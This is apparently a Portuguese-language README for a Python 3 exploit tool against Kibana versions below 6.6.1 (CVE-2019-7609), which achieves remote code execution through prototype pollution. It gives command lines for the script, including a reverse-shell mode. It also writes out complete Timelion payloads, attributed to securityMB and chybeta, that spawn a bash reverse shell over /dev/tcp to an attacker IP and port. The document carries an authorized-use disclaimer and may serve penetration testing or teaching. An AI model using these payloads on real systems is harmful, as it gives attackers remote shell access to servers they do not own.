
Python 3 exploit para Kibana < 6.6.1 RCE (CVE-2019-7609) via poluição de protótipo, com detecção automática de versão e reverse shell opcional.
Autor: LandGrey (Refatoração Python3 por [Seu Nome])
Referência: Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ Aviso:
Este script é apenas para testes de penetração educacionais e autorizados. Não o utilize em sistemas que não possui ou para os quais não tem permissão explícita para testar. O autor e contribuidores não se responsabilizam por qualquer uso indevido ou dano causado por esta ferramenta.
Este é um script de exploit em Python 3 para a vulnerabilidade de Execução Remota de Código em versões do Kibana < 6.6.1. Ele aproveita uma falha de poluição de protótipo para executar comandos arbitrários, incluindo a abertura de uma shell reversa, em uma instância vulnerável do Kibana.
python3 kibana_exploit.py -u http://target-kibana:5601
Para disparar uma shell reversa:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requestspackagingInstale as dependências com:
pip install requests packaging
Você também pode explorar esta vulnerabilidade manualmente usando o visualizador Timelion do Kibana:
Payload por securityMB:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Payload por chybeta:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Substitua 192.168.1.100 e 4444 pelo IP e porta do seu próprio listener.
O script fornece uma saída clara e passo a passo para detecção, verificação e exploração, tornando-o fácil de acompanhar e divertido de usar!
Este script é uma ótima maneira de aprender sobre poluição de protótipo, execução remota de código e técnicas de teste de penetração. Use-o com responsabilidade e sempre com permissão!
Este projeto é apenas para uso educacional. Sem garantias ou responsabilidades. Hacking ético, mantenha-se curioso e divirta-se!